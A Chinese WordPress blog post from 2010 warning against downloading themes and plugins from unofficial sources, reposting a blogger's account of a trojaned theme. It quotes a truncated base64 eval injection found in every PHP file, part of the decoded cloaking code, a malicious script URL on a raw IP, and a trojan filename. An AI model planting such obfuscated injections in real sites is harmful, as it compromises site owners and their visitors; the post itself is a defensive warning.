首页 > Wordpress心得 > WordPress安装主题或插件为什么应该选择官方平台下载

WordPress安装主题或插件为什么应该选择官方平台下载

2010年5月6日 AEROFISH 1,525 views 发表评论 阅读评论

用过WordPress的朋友都知道,主题或者插件,可以在官方的下载平台是寻找。但也可以去一些非官方的地方下载。

如果你到一个非官方的地方去下载来使用,会有什么后果呢?我最近看到一篇文章,讲述的是博主安装了带木马的主题的不幸经历。从中让我了解到,我们在管理博客过程中一定要提高自己的防毒意识,谨慎加细心。

要避免去不良网站下载东西,其实不光光是主题和插件,我想即使是粘贴别人的文章也应该仔细检查文章中是否有恶意代码。

下面我们来看看这位不幸的博主到底发生了什么事情?

转载子猴博客《安装东西要谨慎,小心博客中毒

最近10来天的时间,子猴博客每次打开页面的时候都会加载一个地址的js文件,如http://61.4.82.212/js.php,然后后台管理页面就非常混乱,很多功能用不了,几乎所有的浏览器在打开博客的时候都给予禁止的提示信息,给空间商去信,他们回复说这是因为网站感染了恶意软件(Malware),说没办法帮我,于是没有办法,我就去查网站的文件,后来在任一php文件中都查到了这样一段经过Base64编码后的病毒代码(原文件是没有这段代码的):

<?php /**/ eval(base64_decode("

aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25

vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21y

b2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGd

tbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSkQzQTdCOUUyOEMzNjl

GN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MD……………………………

"));?>

我将其解开后发现是一段类似javascript的代码:

if(function_exists(‘ob_start’)&amp;&amp;!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;   if(!function_exists(‘mrobh’)){      if(!function_exists(‘gml’)){     function gml(){      if (!stristr($_SERVER["HTTP_USER_AGENT"],”googlebot”)&amp;&amp; (!stristr($_SERVER["HTTP_USER_AGENT"],”yahoo”))){
。。。。。。。。

而且在主题根目录下还发现了一个名erwin_troy.php的木马文件,erwin的英文意思是“诊断”,而troy的英文意思是“木马”,里面也是一段经过编码后的代码。

后来没办法,我只好将所有的系统文件,除了图片目录外的都删除掉,然后再重传一遍wordpress的安装程序,之后,网站才恢复正常。

那么这个木马是怎么中的呢?我现在也记不得了,依稀记得是下载了一个主题包,然后试着安装了一下,后来不知道什么时候就中毒了,当然也不确定是因为那个主题的原因,但至少给了我一个教训,那就是在安装主题或插件的时候一定要到官方网站下载,即使一个原本没有问题的东西,但你如果不是在官方网站下载的话,有可能一些居心叵测之徒在其中加一些木马之类的东西。

希望各位朋友们以后在这方面以后也注意一下啊。

【最后修改时间:2010年11月5日】

本文对我无帮助,减1分本文对我有帮助,加1分 (本文对您有帮助吗?)
Loading ... Loading ...

  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.